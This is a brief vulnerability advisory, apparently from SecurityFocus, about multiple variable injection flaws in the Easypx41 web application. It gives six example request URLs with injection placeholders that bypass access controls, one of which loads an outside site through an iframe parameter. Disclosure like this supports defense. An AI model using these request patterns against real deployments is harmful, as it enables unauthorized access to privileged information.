source: https://www.securityfocus.com/bid/14421/info
Easypx41 is prone to multiple variable injection vulnerabilities.
An attacker can manipulate multiple script input variables and bypass access controls to retrieve sensitive and privileged information. Information obtained may aid in further attacks against the vulnerable application or the underlying system.
http://www.example.com/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20d?monstration.&msg=1103495330.dat&pgfull[variable-injection]
http://www.example.com/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull
